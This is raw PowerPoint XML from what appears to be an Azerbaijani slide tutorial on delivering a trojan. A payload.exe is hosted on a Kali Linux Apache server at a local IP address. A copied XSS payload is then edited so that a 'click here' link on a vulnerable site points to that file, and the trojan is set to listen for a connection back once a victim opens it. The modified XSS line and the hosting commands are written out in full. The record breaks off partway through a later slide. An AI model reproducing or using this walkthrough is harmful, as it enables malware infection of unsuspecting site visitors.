          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> hazır olduqda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>trojanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> dinləmə moduna alırıq ki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> hər hansı kompüterdə açıldıqda bizə bağlantı gəlsin </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t>Terminalda bizə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>trojanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> yerini göstərir </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>Trojanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> yerini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>kopyalayırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t>əmri ilə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>KaliLinuxun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> serverinə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>kopyasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> göndəririk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache2 start   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t>əmri ilə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> serverini aktiv edirik</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://192.168.1.102/payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0"/>
              <a:t>linkind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2200" dirty="0"/>
              <a:t>ə hazır vəziyyətdə qalır</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRP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97173" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="19388"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7071214" cy="3033023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097174" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-450" b="17565"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2582944"/>
            <a:ext cx="7081966" cy="4146483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048670" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192650" y="1709354"/>
            <a:ext cx="4374038" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Googledə  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazdıqda ilk çıxan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> shifəsinə giririk ordaki payloadlardan işimizə yarayacaq hər hansı bir payloadı seçirik</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048671" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192650" y="4479213"/>
            <a:ext cx="5343887" cy="353943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;math&gt;&lt;a xlink:href=‘’//jsfiddle.net/t846/’’&gt;click</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048672" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192651" y="4925359"/>
            <a:ext cx="5343887" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Seçilən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kopyalıyırq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048673" name="Mətn Qutusu 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192650" y="0"/>
            <a:ext cx="4999350" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trojanın hazır olduğu linki açığın olduğu shifəyə yerləşdirmək üçün </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kodu axtarırıq</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74"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75" name="Rectangle 11"/>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76" name="Freeform: Shape 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="10825122" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10825122"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY2" fmla="*/ 264816 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 10825122 w 10825122"/>
              <a:gd name="connsiteY3" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY4" fmla="*/ 6593184 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 108251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677"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78" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421432" y="83077"/>
            <a:ext cx="6387930" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;math&gt;&lt;a xlink:href=‘’//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsfiddle.net/t846/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048679" name="Mətn Qutusu 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421432" y="1216884"/>
            <a:ext cx="8562312" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;math&gt;&lt;a xlink:href=‘’//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.102/payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>burabas</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048680" name="Mətn Qutusu 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76985" y="649980"/>
            <a:ext cx="12038030" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t>Tapdığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>payloaddaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>linki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>servərdə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>paylaşdığımız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trojanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1"/>
              <a:t>linki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0"/>
              <a:t> ilə deyişirik </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097175" name="Şəkil 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76985" y="1783788"/>
            <a:ext cx="10119864" cy="2733167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048681" name="Mətn Qutusu 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195188" y="4721455"/>
            <a:ext cx="9618115" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
              <a:t>shifə hazır olduqdan trojanı yükləyəcəyimiz başqa kompüterlə həmən shifəyə giririk</a:t>
            </a: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82"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83" name="Rectangle 11"/>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76" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="149520" y="122249"/>
            <a:ext cx="6737299" cy="5019289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048684"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85" name="Düzbucaqlı 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389106" y="1303506"/>
            <a:ext cx="963039" cy="223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686" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107810" y="405353"/>
            <a:ext cx="4807670" cy="4269741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0"/>
              <a:t>Hədəf  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>burabas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0"/>
              <a:t> bağlantısına basdığı anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1"/>
              <a:t>trojanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0"/>
              <a:t> yüklənməsi haqqında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1"/>
              <a:t>soruçur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0"/>
              <a:t> qəbul etdikdə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0"/>
              <a:t> hədəfə yüklənir</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097177" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="149474" y="3114768"/>
            <a:ext cx="6737253" cy="3342594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>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87"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88" name="Rectangle 11"/>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78" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="937" t="1053" r="1565" b="687"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204281" y="155643"/>
            <a:ext cx="6546715" cy="4931923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048689"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90" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6955276" y="481620"/>
            <a:ext cx="5012987" cy="2987041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4800" dirty="0"/>
              <a:t>Yüklənən </a:t>
            </a:r>
            <a:r>
